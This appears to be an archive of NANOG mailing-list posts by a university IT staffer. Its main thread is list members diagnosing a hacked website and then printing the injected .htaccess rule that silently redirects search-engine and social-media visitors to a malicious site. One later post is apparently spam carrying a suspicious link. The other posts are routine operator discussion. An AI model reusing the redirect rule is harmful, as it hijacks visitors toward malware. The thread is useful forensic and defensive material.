They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer 
[mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com>]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu<http://csulb.edu>  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net<mailto:lstew...@superb.net>]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black 
> mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
>  wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website 
> couchtarts.com<http://couchtarts.com><http://couchtarts.com>.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu><http://www.csulb.edu>
>
>
>
> --
> Landon Stewart 
> mailto:lstew...@superb.net<mailto:lstew...@superb.net>>>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199 Web 
> hosting and more "Ahead
> of the Rest":
> http://www.superbhosting.net<http://www.superbhosting.net/>
>






--
Landon Stewart mailto:lstew...@superb.net>>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net<http://www.superbhosting.net/>

RE: DNS poisoning at Google?

[Matthew Black]

We found the aberrant .htaccess file and have removed it. What a mess!

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 11:02 PM
To: Matthew Black; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Our web lead was able to run curl. Thanks.

matthew black
information technology services
california state university, long beach

From: Grant Ridder 
[mailto:shortdudey...@gmail.com<mailto:shortdudey...@gmail.com>]
Sent: Tuesday, June 26, 2012 10:53 PM
To: Matthew Black
Cc: Landon Stewart; nanog@nanog.org<mailto:nanog@nanog.org>; Jeremy Hanmer

Subject: Re: DNS poisoning at Google?

Matt, what happens you get on a subnet that can access the webservers directly 
and bypass the load balancer.  Try curl then and see if its something w/ the 
webserver or load balancer.

-Grant
On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach

From: Landon Stewart [mailto:lstew...@superb.net<mailto:lstew...@superb.net>]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: DNS poisoning at Google?
There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1<http://www.csulb.edu/%0d%0aHTTP/1.1> 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1
On 26 June 2012 22:05, Matthew Black 
mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
 wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer 
[mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com><mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com>>]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: 
nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org<mailto:nanog@nanog.org>>
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:
Airy:~ user$ curl -e 'http://google.com' 
csulb.edu<http://csulb.edu><http://csulb.edu>  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
 wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart 
> [mailto:lstew...@superb.net<mailto:lstew...@superb.net><mailto:lstew...@superb.net<mailto:lstew...@superb.net>>]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: 
> nanog@nanog.org<mailto:nanog@nanog.org><mailto:nanog@nanog.org<mailto:nanog@nanog.org>>
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black 
> mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu&l

RE: DNS poisoning at Google?

[Matthew Black]

Yes, we did that and also noted the username and IP address from where the FTP 
upload originated.

matthew black
information technology services
california state university, long beach



-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Wednesday, June 27, 2012 12:37 AM
To: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."

RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Matthew Black]

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

  # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> > wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (specially for a Web site written in
> >> PHP)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))

RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Matthew Black]

By the way, FTP access originated from: 208.88.11.111

Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

NetRange:   208.88.8.0 - 208.88.11.255
CIDR:   208.88.8.0/22
OriginAS:   AS40603
NetName:SKYWIRE-SG
NetHandle:  NET-208-88-8-0-1
Parent: NET-208-0-0-0-0
NetType:Direct Allocation
Comment:http://www.skywireusa.com
RegDate:2008-03-04
Updated:2012-03-02
Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1

OrgName:Sky Wire Communications
OrgId:  DGSU
Address:946 W Sunset Blvd Ste L
City:   St George
StateProv:  UT
PostalCode: 84770
Country:US
RegDate:2007-12-04
Updated:2009-11-04
Ref:http://whois.arin.net/rest/org/DGSU


Who We Are
Skywire Communications is the Leading High Speed Internet Provider in Southern 
Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar 
City, and Enoch. It is the goal of SkyWire Communications to provide high speed 
internet access to 100 Percent of Southern Utah. We are located in St George, 
Utah.




matthew black
information technology services
california state university, long beach



-Original Message-
From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
Sent: Wednesday, June 27, 2012 9:52 AM
To: 'Jason Hellenthal'; Arturo Servin
Cc: nanog@nanog.org
Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

      # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> > wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (specially for a Web site written in
> >> PHP)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))

RE: Color vision for network techs

[Matthew Black]

Yeah, I had that trouble with the old Cabletron (Enterasys) network management 
software. About 6% of Euro-American males suffer from Deuteranopia. I cannot 
see the difference between dark green and dark red. Bright green and bright red 
are better. It was not possible to adjust the Cabletron software. Contrary to 
popular belief, most of us can easily tell the difference between red and green 
traffic signals.

Color-proficient readers can get an idea of our disability from this website 
that sells Photoshop filters for graphics artists:

http://www.vischeck.com

Check out the Examples.


matthew black
california state university, long beach



-Original Message-
From: Betsy Schwartz [mailto:betsy.schwa...@gmail.com] 
Sent: Friday, August 31, 2012 1:30 PM
To: nanog@nanog.org
Subject: Re: Color vision for network techs

 I installed monitoring software with different colored status dots,
and discovered that we had three color-blind team members. After a
pleasant hour's tweaking I ended up with green diamonds, red X's,
purple squares, and yellow exclamation points (and on this particular
application a mouse-over would also tell you the name of the color
gif) Looked better for *everyone*.

HXXP browser protocol

[Matthew Black]

Checking if anyone else has heard of this protocol. It seems to be a method of 
bypassing security filtering software.

The reason I ask is that we received a security alert with a link 
hxxp://pastebin.com/###.

Seems very suspicious and want to know if anyone can shed light. Is this a new 
phishing/malware methodology?

matthew black
california state university, long beach

RE: Gmail and SSL

[Matthew Black]

A major problem with free or low-cost certificates is that their intermediate 
CA certificate does not always point back to a root certificate in client 
machines and/or software.

matthew black
california state university, long beach



-Original Message-
From: Peter Kristolaitis [mailto:alte...@alter3d.ca] 
Sent: Friday, December 14, 2012 7:53 AM
To: nanog@nanog.org
Subject: Re: Gmail and SSL

On 12/14/2012 10:47 AM, Randy wrote:
> I don't have hundreds of dollars to get my ssl certificates signed

You can get single-host certificates issued for free from StartSSL, or 
for very cheaply (under $10) from low-cost providers like CheapSSL.com.  
I've never had a problem having my StartSSL certs verified by anyone.

- Pete

RE: why haven't ethernet connectors changed?

[Matthew Black]

Are you talking about the "N" connectors with those 802.3 transceiver cables, 
BNC connectors (10Base5), or an Type RJ45 (10Base-T) telco style connector?

I couldn't find anyone selling multi-step thicknet strippers in the late 1980s, 
so I had to use a Xacto knife to prepare thicknet cable and then crimp about 20 
N connectors. Data General donated 8 workstations and CAD circuit-design 
software to our University. The workstations used N-style transceivers instead 
of those with vampire taps.

What a nightmare!  )-;

matthew black
california state university, long beach


-Original Message-
From: Michael Thomas [mailto:m...@mtcc.com] 
Sent: Thursday, December 20, 2012 10:20 AM
To: NANOG list
Subject: why haven't ethernet connectors changed?

I was looking at a Raspberry Pi board and was struck with how large the ethernet
connector is in comparison to the board as a whole. It strikes me: ethernet
connectors haven't changed that I'm aware in pretty much 25 years. Every other
cable has changed several times in that time frame. I imaging that if anybody
cared, ethernet cables could be many times smaller. Looking at wiring closets,
etc, it seems like it might be a big win for density too.

So why, oh why, nanog the omniscient do we still use rj45's?

Mike

RE: why haven't ethernet connectors changed?

[Matthew Black]

http://www.blackbox.com/Store/Detail.aspx/Ethernet-Transceiver-Cable-Office-Environment-PVC-IEEE-802-3-Right-Angle-Connector-3-ft-0-9-m/LCN216%C4%820003

Only $55.95 for a 3-foot transceiver cable. What was more surprising is that 
Black Box is still around.


matthew black
california state university, long beach


-Original Message-
From: Michael Thomas [mailto:m...@mtcc.com] 
Sent: Thursday, December 20, 2012 10:20 AM
To: NANOG list
Subject: why haven't ethernet connectors changed?

I was looking at a Raspberry Pi board and was struck with how large the ethernet
connector is in comparison to the board as a whole. It strikes me: ethernet
connectors haven't changed that I'm aware in pretty much 25 years. Every other
cable has changed several times in that time frame. I imaging that if anybody
cared, ethernet cables could be many times smaller. Looking at wiring closets,
etc, it seems like it might be a big win for density too.

So why, oh why, nanog the omniscient do we still use rj45's?

Mike

RE: Windows 10 Release

[Matthew Black]

Are users required to create any type of Microsoft cloud account (e.g., 
OneDrive, Office365, et alil) in order to install and use Windows 10? Of 
Office? Is it possible to simply use Windows 10 without any Microsoft or Google 
or Yahoo accounts? 

Is the unique identifier available to advertisers only through IE (or its 
successor) OR will it also be available through Firefox/Chrome?


matthew black
california state university, long beach

Verizon exiting California

[Matthew Black]

Verizon sent me a letter the other day stating that they are selling their 
landline business to Frontier Communications. It was a very terse letter and as 
a customer I don't know if it affects me. While stating they aren't exiting the 
Wireless business, I want to know which parts are being sold off. Just the 
copper lines, POTS, DSL, FIOS (TV, Internet, phone)? Some clarity would be 
great.  I am a FIOS only customer. Can anyone recall if GTE was blocked from 
doing the same thing a few decades ago?

matthew black
california state university, long beach

RE: Verizon exiting California

[Matthew Black]

Nevermind. I found a February article detailing the plan.

arstechnica: Verizon sells three-state territory, including 1.6 million FiOS 
users
http://arstechnica.com/business/2015/02/verizon-sells-three-state-territory-including-1-6-million-fios-users/

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Matthew Black
Sent: Thursday, July 30, 2015 9:26 AM
To: North American Network Operators' Group (nanog@nanog.org)
Subject: Verizon exiting California

Verizon sent me a letter the other day stating that they are selling their 
landline business to Frontier Communications. It was a very terse letter and as 
a customer I don't know if it affects me. While stating they aren't exiting the 
Wireless business, I want to know which parts are being sold off. Just the 
copper lines, POTS, DSL, FIOS (TV, Internet, phone)? Some clarity would be 
great.  I am a FIOS only customer. Can anyone recall if GTE was blocked from 
doing the same thing a few decades ago?

matthew black
california state university, long beach

RE: [BULK] Verizon exiting California

[Matthew Black]

I ran a few Google searches and came across a trove of complaints against 
Frontier. Seems they are far worse than GTE/Verizon. On the few occasions I 
have called for FIOS support, always reached someone knowledgeable and helpful. 
Not looking forward to the changeover, as the new owners have to pay off debts 
from their acquisition. That can only be accomplished through rate increases. I 
see a Verizon tech outside my kitchen window every two to three days as he 
replaces two nitrogen tanks keeping copper trunks pressurized against water 
intrusion.

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Mike
Sent: Friday, July 31, 2015 7:33 AM
To: nanog@nanog.org
Subject: Re: [BULK] Verizon exiting California

On 07/31/2015 06:27 AM, Mike Hammett wrote:
> Can anyone else back that up (or refute it)?
>
>


I am a CLEC operating in California west, and I collocate with verizon. 
Yes, Verizon is proposing to sell it's wireline assets to Frontier and 
become effectively an all-wireless carrier.


Frontier is going to get a patchwork of ancient switches and poorly 
maintained outside plant, in rural areas that would require tens of 
millions of dollars in upgrades for sparely populaed areas it could 
never turn a profit on. I seriously wonder about the viability of taking 
on the debt to get those areas and even just maintain them, vz itself 
has done a very poor job and it presently operates a network where E911 
routinely fails along with pots for many, for weeks at a time. And 
somehow, Verizon has been allowed to skate along without being held to 
the fire for it's mandated utility / carrier of last resort obligations.

I worry that Frontier, with all the new added debt obligations, will not 
able to swallow this pill.

Mike-

RE: [BULK] Verizon exiting California

[Matthew Black]

I don't live in a new suburban community with modern utilities. Well, the 50 
year-old water main on my street was replaced about 10 years ago. We haven't 
suffered major flooding like UCLA experienced last year. My house was built in 
1930. Much of that telco copper is pushing 70 years old or more. Some is above 
ground and some is underground. Until recently, the underground vault would 
flood whenever it rained. The b-box uses screw-type terminals, not even 66 or 
BIX. Thank you GTE.

matthew black
california state university, long beach


-Original Message-
From: Andrew Carey [mailto:ca...@ar-ballbat.org] 
Sent: Tuesday, August 04, 2015 10:02 AM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: [BULK] Verizon exiting California


> On Aug 3, 2015, at 10:09, Matthew Black  wrote:
> 
> I ran a few Google searches and came across a trove of complaints against 
> Frontier. Seems they are far worse than GTE/Verizon. On the few occasions I 
> have called for FIOS support, always reached someone knowledgeable and 
> helpful. Not looking forward to the changeover, as the new owners have to pay 
> off debts from their acquisition. That can only be accomplished through rate 
> increases. I see a Verizon tech outside my kitchen window every two to three 
> days as he replaces two nitrogen tanks keeping copper trunks pressurized 
> against water intrusion.

Cutting expenses is another (well, and selling more too). Properly 
engineered/maintained cable should not require that level of constant 
attention. 

Verizon FIOS routing trouble to Facebook

[Matthew Black]

Anyone around from Verizon? Cannot reach Facebook through Verizon FIOS in Long 
Beach, CA. No trouble on the AT&T 4G LTE network.

Thursday, August 14, 2015 @ 0410 UTC

matthew black
california state university, long beach

RE: Verizon FIOS routing trouble to Facebook

[Matthew Black]

Pinging star.c10r.facebook.com [31.13.70.1] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

As I said, it fails from FIOS in Long Beach CA.

On the phone with FIOS support now. The tech wants me to reset my router to 
factory defaults even after explaining I can reach everything else. I suggested 
they had an upstream routing or peering problem.



-Original Message-
From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
Behalf Of Christopher Morrow
Sent: Thursday, August 13, 2015 9:18 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: Verizon FIOS routing trouble to Facebook

On Fri, Aug 14, 2015 at 12:12 AM, Matthew Black  wrote:
> Anyone around from Verizon? Cannot reach Facebook through Verizon FIOS in 
> Long Beach, CA. No trouble on the AT&T 4G LTE network.
>

$ p www.facebook.com
PING star.c10r.facebook.com (31.13.69.197) 56(84) bytes of data.
64 bytes from edge-star-shv-01-iad3.facebook.com (31.13.69.197):
icmp_seq=1 ttl=89 time=12.1 ms
64 bytes from edge-star-shv-01-iad3.facebook.com (31.13.69.197):
icmp_seq=2 ttl=89 time=5.64 ms

(looks like I'm talking to an east-coast fb instance)

...
 5  0.ae6.xl2.iad8.alter.net (140.222.228.57)  24.242 ms  24.707 ms *
 6  0.xe-11-0-1.gw9.iad8.alter.net (152.63.33.169)  22.515 ms 
0.xe-11-1-0.gw9.iad8.alter.net (152.63.35.117)  15.337 ms 
0.xe-10-3-0.gw9.iad8.alter.net (152.63.41.246)  10.154 ms
 7  fb-gw.customer.alter.net (204.148.11.102)  24.263 ms  11.457 ms  9.897 ms
 8  psw01a.iad3.tfbnw.net (204.15.23.162)  10.428 ms psw01b.iad3.tfbnw.net 
(204.15.23.154)  7.720 ms psw01c.iad3.tfbnw.net
(204.15.23.144)  9.050 ms
...

RE: Ear protection

[Matthew Black]

I use the 3M E-A-R plugs at home and love them. Since my tragus doesn't fold 
over, I am unable to use traditional Apple earbuds or other things that just 
fall out of my ear. 3M E-A-R plugs are like memory foam and fit snugly, 
providing excellent noise reduction. I use ComplyFoam on in-ear headphones for 
the same reason, because those thin rubber ear bud covers are useless.

http://www.amazon.com/3M-E-A-R-Classic-earplugs-Pair/dp/B007GBUC7M

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Nick Hilliard
Sent: Wednesday, September 23, 2015 2:34 AM
To: nanog@nanog.org
Subject: Ear protection

What are people using for ear protection for datacenters these days?  I'm
down to my last couple of corded 3M 1110:

http://www.shop3m.com/3m-corded-earplugs-hearing-conservation-1110.html

These work reasonably well in practice, with a rated nominal noise
reduction rate of 29dB.  Some people find them uncomfortable, but they work
well for me.

There are other ear plugs with rated NRR of up to 32-33dB.  Anyone have any
opinions on what brands work well for them?

Nick

RE: Facebook invisible in Italy

[Matthew Black]

Facebook has been running sluggish all day in California US for me.

matthew black
california state university, long beach

-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Marco Paesani
Sent: Monday, September 28, 2015 1:35 PM
To: nanog
Subject: Facebook invisible in Italy

Hi,
some issues from FB network ??
Do you have some info ?
Regards,

-- 

Marco Paesani
MPAE Srl

Skype: mpaesani
Mobile: +39 348 6019349
Success depends on the right choice !
Email: ma...@paesani.it

RE: IP-Echelon Compliance

[Matthew Black]

If the IP addresses, hostnames, or domain names are not yours, why would you 
even bother responding? IANAL, I don't think it's your responsibility to direct 
them to the correct place.

Consider an auto-responder directing them to the DMCA page of your corporate 
website.

matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Baldur Norddahl
Sent: Friday, October 09, 2015 1:00 PM
To: nanog@nanog.org
Subject: IP-Echelon Compliance

Hi

I am sure all of you know of these guys. But what do you do when they keep
spamming your abuse address with reports for illegal downloads from
IP-addresses that are in no way related to our business?

I tried contacting them. And was told repeatedly that I had to update whois
information if I want the reports to be sent to another address. How I do
that for IP-ranges that are not mine is a good question. Besides the whois
information for said IP-ranges already have valid abuse information and it
is not our email address.

Do I just block them for spamming?

Regards,

Baldur

RE: IP-Echelon Compliance

[Matthew Black]

As a recipient of their stuff, it would be nice if IP Echelon even followed the 
information registered with the US Copyright Office for such notices. We paid 
$80 to let everyone know where notices should be sent.

matthew black
First Amendment: speaking for myself and not my employer!


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Seth Arnold
Sent: Monday, October 12, 2015 3:05 PM
To: nanog@nanog.org
Subject: RE: IP-Echelon Compliance

Hi All,

Please feel free to get in touch with us to request changes.

Expedited processing of your requests is offered through the Notice Recipient 
Management for ISPs section of our website located here:
http://www.ip-echelon.com/isp-notice-management/ 
<http://www.ip-echelon.com/isp-notice-management/>

If you are in the U.S., please also ensure that your change is reflected in the 
records of the US Copyright Office:  
http://copyright.gov/onlinesp/list/a_agents.html 
<http://copyright.gov/onlinesp/list/a_agents.html>


Cheers,
Seth

RE: Dial Up Solutions

[Matthew Black]

Livingston/Lucent PortMaster 3. 48 ports over 2 T1 interfaces and 10baseT all 
in 3 RU. Supports RADIUS. We dumped our last boxes many years ago; you can 
probably find some at portmasters.com.

Cheers.

matthew black
california state university, long beach

-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Will Duquette
Sent: Friday, October 16, 2015 12:29 PM
To: nanog@nanog.org
Subject: Dial Up Solutions

Does anyone have any suggestions on equipment for our ISP that is still
supporting dial up customers?

At the moment we are running 3Com Total Control 1000's but are running out
of spare parts as we have failures.  Given that this gear is so old trying
to source spare parts is proving to be difficult.

We do have access to an Cisco AS5200 but are looking for maybe a SIP based
solution that could possibly run on our VM farm?  Has anyone heard of
anything like that or does it even exist?

What kind of gear are you running if you still are supporting dial up
customers?

Thanks in advance

-- 
Will Duquette
GWI
Network Systems Engineer
www.gwi.net

Fw: new message

[Matthew Black]

Hey!

 

New message, please read <http://acresnacres.ca/however.php?7r>

 

Matthew Black

RE: ICYMI: FBI looking into LA fiber cuts, Super Bowl

[Matthew Black]

Enclosed stadiums won't have to worry about remote drones until they get smart 
enough to open doors on their own. Not sure why the NFL gets uptight about 
unauthorized recording. Most sporting events have little value once the event 
is over.

matthew black


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Paul Ferguson
Sent: Tuesday, January 19, 2016 4:42 PM
To: nanog@nanog.org
Subject: Re: ICYMI: FBI looking into LA fiber cuts, Super Bowl


